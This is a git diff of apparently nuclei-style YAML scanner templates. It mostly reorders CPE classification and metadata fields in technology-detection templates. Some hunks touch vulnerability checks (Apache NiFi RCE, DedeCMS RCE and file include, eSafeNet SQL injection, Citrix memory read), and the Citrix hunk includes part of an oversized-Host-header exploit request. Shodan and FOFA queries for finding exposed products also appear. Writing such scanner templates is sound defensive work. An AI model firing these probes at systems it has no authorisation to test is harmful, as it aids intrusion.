tags: tech,rseenet
- classification:
- cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/rsshub-detect.yaml b/http/technologies/rsshub-detect.yaml
index d8d6ac9cd8..df03a2c32e 100644
--- a/http/technologies/rsshub-detect.yaml
+++ b/http/technologies/rsshub-detect.yaml
@@ -4,16 +4,16 @@ info:
name: RSSHub Detect
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-1893514038
- product: rsshub
vendor: rsshub
+ product: rsshub
+ shodan-query: http.favicon.hash:-1893514038
tags: tech,rsshub
- classification:
- cpe: cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,4 +26,4 @@ http:
dsl:
- "('-1893514038' == mmh3(base64_py(body)))"
-# digest: 4a0a0047304502200b930007fba7016c9a7d06be164a695e5dd532efbccae63f6cefd26211d94536022100d04c76687ce953ec82e729b1b4402d2608d46e7baf6bcfe3a2392322aa11ab08:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200b930007fba7016c9a7d06be164a695e5dd532efbccae63f6cefd26211d94536022100d04c76687ce953ec82e729b1b4402d2608d46e7baf6bcfe3a2392322aa11ab08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/samsung-smarttv-debug.yaml b/http/technologies/samsung-smarttv-debug.yaml
index 08c80fb9a4..830acbdf0f 100644
--- a/http/technologies/samsung-smarttv-debug.yaml
+++ b/http/technologies/samsung-smarttv-debug.yaml
@@ -4,16 +4,16 @@ info:
name: Samsung SmartTV Debug Config
author: pussycat0x
severity: info
+ classification:
+ cpe: cpe:2.3:o:samsung:nt14u_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Debug Config"
- product: nt14u_firmware
vendor: samsung
+ product: nt14u_firmware
+ shodan-query: title:"Debug Config"
tags: samsung,tech,iot
- classification:
- cpe: cpe:2.3:o:samsung:nt14u_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,4 @@ http:
status:
- 200
-# digest: 490a0046304402203d300a937bbfb64879cf0fa0b76e8939622b06d84954d8ece5e0f9355da6b7d0022002369bcc085f65a53ee1753578d19ed97c4615a7e129ec9ec303ce8ba68bb922:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402203d300a937bbfb64879cf0fa0b76e8939622b06d84954d8ece5e0f9355da6b7d0022002369bcc085f65a53ee1753578d19ed97c4615a7e129ec9ec303ce8ba68bb922:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml
index c922ea0ecc..a926b513b5 100644
--- a/http/technologies/sharefile-storage-server.yaml
+++ b/http/technologies/sharefile-storage-server.yaml
@@ -4,16 +4,16 @@ info:
name: ShareFile Storage Server - Detect
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"ShareFile Storage Server"
- product: sharefile_storage_zones_controller
vendor: citrix
+ product: sharefile_storage_zones_controller
+ shodan-query: title:"ShareFile Storage Server"
tags: tech,citrix,sharefile
- classification:
- cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502207ca5079a2f0c74cbd6b9594958e360176f50fc609bf9de0c27bfdd93f78df544022100f40278d7ff54983742c56073d73db238786d79942ec91b1ccd52c4b1c93924cb:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207ca5079a2f0c74cbd6b9594958e360176f50fc609bf9de0c27bfdd93f78df544022100f40278d7ff54983742c56073d73db238786d79942ec91b1ccd52c4b1c93924cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/shopware-detect.yaml b/http/technologies/shopware-detect.yaml
index 509f4ed89c..be8e179bc5 100644
--- a/http/technologies/shopware-detect.yaml
+++ b/http/technologies/shopware-detect.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://github.com/shopware/shopware
- https://github.com/shopware/platform
+ classification:
+ cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"shopware AG"
- product: shopware
vendor: shopware
+ product: shopware
+ shodan-query: title:"shopware AG"
tags: tech,shopware,cms
- classification:
- cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100f5dedd7b164741bfc8676fe3df4689ec6b74c8c244be4938643ad3ab1806755e02210093c10795b77bb72b7baafa642dca97b240e8c8ebfbf98e9c42e51c1c4cfc6697:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100f5dedd7b164741bfc8676fe3df4689ec6b74c8c244be4938643ad3ab1806755e02210093c10795b77bb72b7baafa642dca97b240e8c8ebfbf98e9c42e51c1c4cfc6697:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml
index cd67a94029..97c5ed9ba7 100644
--- a/http/technologies/simplesamlphp-detect.yaml
+++ b/http/technologies/simplesamlphp-detect.yaml
@@ -8,16 +8,16 @@ info:
SimpleSAMLphp was detected.
reference:
- https://simplesamlphp.org/
+ classification:
+ cpe: cpe:2.3:a:simplesamlphp:simplesamlphp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: "http.title:\"SimpleSAMLphp installation page\""
- product: simplesamlphp
vendor: simplesamlphp
+ product: simplesamlphp
+ shodan-query: "http.title:\"SimpleSAMLphp installation page\""
tags: tech,simplesamlphp,detect
- classification:
- cpe: cpe:2.3:a:simplesamlphp:simplesamlphp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,11 +25,11 @@ http:
- "{{BaseURL}}/module.php/core/frontpage_welcome.php"
stop-at-first-match: true
-
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "you have successfully installed simplesamlphp", "simplesamlphp installation page", "/module.php/core/login-admin.php")'
condition: and
-# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml
index 78040e3107..c3b252c5c3 100644
--- a/http/technologies/sitecore-cms.yaml
+++ b/http/technologies/sitecore-cms.yaml
@@ -8,16 +8,16 @@ info:
Detect Sitecore Content Management System (CMS) websites based on a redirect from the sitecore media handler URL pattern to the notfound.aspx page.
reference: |
https://www.sitecore.com
+ classification:
+ cpe: cpe:2.3:a:sitecore:cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"sitecore"
- product: cms
vendor: sitecore
+ product: cms
+ shodan-query: title:"sitecore"
tags: cms,sitecore,tech
- classification:
- cpe: cpe:2.3:a:sitecore:cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 302
-# digest: 4a0a00473045022100f0c832c2edd97e823cf892321f6d33feb8ab05f2343a70d8c87eeba946e01912022070ec4b59a10f79d3bfd970eed2955383c076eea9ebacb2780cee7a73407393b8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f0c832c2edd97e823cf892321f6d33feb8ab05f2343a70d8c87eeba946e01912022070ec4b59a10f79d3bfd970eed2955383c076eea9ebacb2780cee7a73407393b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/smartstore-detect.yaml b/http/technologies/smartstore-detect.yaml
index 376af8bd5e..aa5438216d 100644
--- a/http/technologies/smartstore-detect.yaml
+++ b/http/technologies/smartstore-detect.yaml
@@ -6,15 +6,15 @@ info:
severity: info
reference:
- https://github.com/smartstore/SmartStoreNET
- metadata:
- max-request: 1
- shodan-query: http.html:'content="Smartstore'
- product: smartstore
- vendor: smartstore
- tags: tech,smartstore,oss
-
classification:
cpe: cpe:2.3:a:smartstore:smartstore:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: smartstore
+ product: smartstore
+ shodan-query: http.html:'content="Smartstore'
+ tags: tech,smartstore,oss
+
http:
- method: GET
path:
@@ -38,4 +38,4 @@ http:
regex:
- ''
-# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/sogo-detect.yaml b/http/technologies/sogo-detect.yaml
index 9f2581ad51..d652c17e80 100644
--- a/http/technologies/sogo-detect.yaml
+++ b/http/technologies/sogo-detect.yaml
@@ -7,16 +7,16 @@ info:
description: This template will detect a running SOGo instance
reference:
- https://www.sogo.nu/
+ classification:
+ cpe: cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.title:"SOGo"
- product: sogo
vendor: alinto
+ product: sogo
+ shodan-query: http.title:"SOGo"
tags: sogo,tech
- classification:
- cpe: cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502210086cd277a5f6f1488af70eda52044fbbdc23fdea0de4d17e983b5690e12f1902f02206396093d422c25596b3af15dfafe520463208f0582f25c4d7a1554db16c4be4a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210086cd277a5f6f1488af70eda52044fbbdc23fdea0de4d17e983b5690e12f1902f02206396093d422c25596b3af15dfafe520463208f0582f25c4d7a1554db16c4be4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml
index e6a0770856..ed4adad70d 100644
--- a/http/technologies/statamic-detect.yaml
+++ b/http/technologies/statamic-detect.yaml
@@ -8,16 +8,16 @@ info:
Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites.
reference:
- https://github.com/statamic/cms
+ classification:
+ cpe: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "Statamic"
- product: statamic
vendor: statamic
+ product: statamic
+ shodan-query: "Statamic"
tags: tech,statamic,detect
- classification:
- cpe: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
part: header
regex:
- 'X-Powered-By:(.*)Statamic'
-# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/subrion-cms-detect.yaml b/http/technologies/subrion-cms-detect.yaml
index bf156e5e20..6bf1dc99a2 100644
--- a/http/technologies/subrion-cms-detect.yaml
+++ b/http/technologies/subrion-cms-detect.yaml
@@ -4,16 +4,16 @@ info:
name: Subrion CMS Detect
author: pikpikcu
severity: info
- metadata:
- max-request: 1
- shodan-query: http.component:"Subrion"
- fofa-query: title="subrion"
- product: subrion
- vendor: intelliants
- tags: subrion,tech
-
classification:
cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: intelliants
+ product: subrion
+ shodan-query: http.component:"Subrion"
+ fofa-query: title="subrion"
+ tags: subrion,tech
+
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022027bac5306a75de09a6697c0888b73fc16a327a8e28b3eb8efcb22f434f6dedf40221008d448c9cfce0c968fb57ef765b50802f57c258ac3a21efb70ad44aa66211e060:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022027bac5306a75de09a6697c0888b73fc16a327a8e28b3eb8efcb22f434f6dedf40221008d448c9cfce0c968fb57ef765b50802f57c258ac3a21efb70ad44aa66211e060:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/tibco-businessconnect-detect.yaml b/http/technologies/tibco-businessconnect-detect.yaml
index d88aa0886f..c75562cad6 100644
--- a/http/technologies/tibco-businessconnect-detect.yaml
+++ b/http/technologies/tibco-businessconnect-detect.yaml
@@ -8,16 +8,16 @@ info:
TIBCO BusinessConnect technology was detected.
reference:
- https://www.tibco.com/products/tibco-businessconnect
+ classification:
+ cpe: cpe:2.3:a:tibco:businessconnect:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"TIBCO BusinessConnect"
- product: businessconnect
vendor: tibco
+ product: businessconnect
+ shodan-query: http.html:"TIBCO BusinessConnect"
tags: tibco,detect,tech
- classification:
- cpe: cpe:2.3:a:tibco:businessconnect:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code == 200'
- 'contains(header, "TIBCO BusinessConnect")'
condition: and
-# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml
index 3a5574e781..75fc1ce76a 100644
--- a/http/technologies/tibco-spotfire-services-detect.yaml
+++ b/http/technologies/tibco-spotfire-services-detect.yaml
@@ -8,16 +8,16 @@ info:
TIBCO Spotfire Statistics Services was detected.
reference:
- https://docs.tibco.com/products/tibco-spotfire-statistics-services
+ classification:
+ cpe: cpe:2.3:a:tibco:spotfire_statistics_services:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- shodan-query: "TIBCO Spotfire Server"
- product: spotfire_statistics_services
vendor: tibco
+ product: spotfire_statistics_services
+ shodan-query: "TIBCO Spotfire Server"
tags: tech,tibco,detect
- classification:
- cpe: cpe:2.3:a:tibco:spotfire_statistics_services:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
group: 1
regex:
- 'Version\s+([0-9.\s\(\)V]+)'
-# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml
index d8100b3ea7..6e235e5010 100644
--- a/http/technologies/tinyproxy-detect.yaml
+++ b/http/technologies/tinyproxy-detect.yaml
@@ -8,16 +8,16 @@ info:
Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems
reference:
- https://github.com/tinyproxy/tinyproxy
+ classification:
+ cpe: cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "Server: tinyproxy"
- product: tinyproxy
vendor: tinyproxy_project
+ product: tinyproxy
+ shodan-query: "Server: tinyproxy"
tags: tech,proxy,detect
- classification:
- cpe: cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: kval
kval:
- server
-# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/typo3-detect.yaml b/http/technologies/typo3-detect.yaml
index 2fddb0de99..708d4c37cc 100644
--- a/http/technologies/typo3-detect.yaml
+++ b/http/technologies/typo3-detect.yaml
@@ -4,15 +4,15 @@ info:
name: TYPO3 Detection
author: dadevel
severity: info
- metadata:
- max-request: 1
- shodan-query: http.component:"TYPO3"
- product: typo3
- vendor: typo3
- tags: tech,typo3
-
classification:
cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: typo3
+ product: typo3
+ shodan-query: http.component:"TYPO3"
+ tags: tech,typo3
+
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
words:
- '([ a-z0-9.-]+)'
- 'content="YOURLS([ 0-9.]+)"'
-# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/technologies/zend-server-test-page.yaml b/http/technologies/zend-server-test-page.yaml
index 57d33306e9..998ce0268b 100644
--- a/http/technologies/zend-server-test-page.yaml
+++ b/http/technologies/zend-server-test-page.yaml
@@ -4,16 +4,16 @@ info:
name: Zend Server Test Page
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Zend Server Test Page"
- product: zend_server
vendor: zend
+ product: zend_server
+ shodan-query: title:"Zend Server Test Page"
tags: tech,zend
- classification:
- cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502201fd2dcfb4d8a21f34539ef7ddfa74825dc28f01cc2671f1f37bb192246d51c6e022100b1cddd2a25a66593730fdbf5f57e7946972b05fb24fafd75827b214cef999d1d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201fd2dcfb4d8a21f34539ef7ddfa74825dc28f01cc2671f1f37bb192246d51c6e022100b1cddd2a25a66593730fdbf5f57e7946972b05fb24fafd75827b214cef999d1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/apache/apache-nifi-rce.yaml b/http/vulnerabilities/apache/apache-nifi-rce.yaml
index 383b479033..dc9f623d56 100644
--- a/http/vulnerabilities/apache/apache-nifi-rce.yaml
+++ b/http/vulnerabilities/apache/apache-nifi-rce.yaml
@@ -10,6 +10,8 @@ info:
- https://github.com/imjdl/Apache-NiFi-Api-RCE
- https://labs.withsecure.com/tools/metasploit-modules-for-rce-in-apache-nifi-and-kong-api-gateway
- https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt
+ classification:
+ cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -18,8 +20,6 @@ info:
vendor: apache
tags: packetstorm,apache,nifi,rce
- classification:
- cpe: cpe:2.3:a:apache:nifi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
index a90445c7db..faf791d83a 100644
--- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
+++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
@@ -10,16 +10,16 @@ info:
remediation: Update to version 13.1-51.15 or later
reference:
- https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory
+ classification:
+ cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-1292923998,-1166125415
- product: netscaler_gateway
vendor: citrix
+ product: netscaler_gateway
+ shodan-query: http.favicon.hash:-1292923998,-1166125415
tags: citrix,netscaller,gateway,oob
- classification:
- cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
http:
- raw:
- |+
@@ -27,6 +27,7 @@ http:
Host:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
unsafe: true
+
matchers-condition: and
matchers:
- type: word
@@ -39,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220728bf84816998d58d541ed1a352c6a5376a1f83545a85e6eabcc8d69ebb24e17022100f1652ecf3c29d0bbd5302823d1304ba5285767319ebcfb0822e993357a987332:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
index 5b78d74350..b210ce515f 100644
--- a/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml
@@ -7,16 +7,16 @@ info:
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference:
- https://www.cnblogs.com/milantgh/p/3615986.html
+ classification:
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"power by dedecms" || title:"dedecms"
- product: dedecms
vendor: dedecms
+ product: dedecms
+ shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms
- classification:
- cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,4 @@ http:
status:
- 200
-# digest: 4a0a004730450220705c0901bb2debdb5f0d26f01cbf9af70a8ef4a2e60cec83f54a336933ed1756022100d6a8d6191c1622538f5363f09e96753c9f24a494ede7f641998d4ea7d3556688:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220705c0901bb2debdb5f0d26f01cbf9af70a8ef4a2e60cec83f54a336933ed1756022100d6a8d6191c1622538f5363f09e96753c9f24a494ede7f641998d4ea7d3556688:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/dedecms/dedecms-rce.yaml b/http/vulnerabilities/dedecms/dedecms-rce.yaml
index 21f1fb2892..7c3e66d336 100644
--- a/http/vulnerabilities/dedecms/dedecms-rce.yaml
+++ b/http/vulnerabilities/dedecms/dedecms-rce.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
- https://sectime.top/post/1d114771.html
+ classification:
+ cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -17,8 +19,6 @@ info:
vendor: dedecms
tags: dedecms,cms,rce
- classification:
- cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
index cae70c3ba7..45d7ac7982 100644
--- a/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
+++ b/http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
@@ -8,17 +8,17 @@ info:
reference:
- https://crx.xmspace.net/discuz_x25_api_php.html
- http://www.1314study.com/t/87417.html
+ classification:
+ cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: comsenz
+ product: discuz\\!
shodan-query: title:"Discuz!"
fofa-query: title="Discuz!"
- product: discuz\\!
- vendor: comsenz
tags: discuz,info,disclosure
- classification:
- cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +42,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502202a08c3fa9304cacdc32c84c55e79263202268de3fd524bd2edc44d0a687648af022100b8d1d52d3b88bcf50cd5f659d3e59024543fa9e29086e2f1383aa904b46e2d68:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202a08c3fa9304cacdc32c84c55e79263202268de3fd524bd2edc44d0a687648af022100b8d1d52d3b88bcf50cd5f659d3e59024543fa9e29086e2f1383aa904b46e2d68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
index 434a77531a..9c607c99df 100644
--- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
+++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
@@ -7,6 +7,8 @@ info:
description: Directiory listing enabled in Node ecstatic.
reference:
- https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/
+ classification:
+ cpe: cpe:2.3:a:ecstatic_project:ecstatic:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 1
@@ -15,8 +17,7 @@ info:
vendor: ecstatic_project
tags: node,js,listing,ecstatic
- classification:
- cpe: cpe:2.3:a:ecstatic_project:ecstatic:*:*:*:*:node.js:*:*:*
+
http:
- method: GET
path:
diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
index d8a5fabd98..7cf8f30222 100644
--- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
+++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
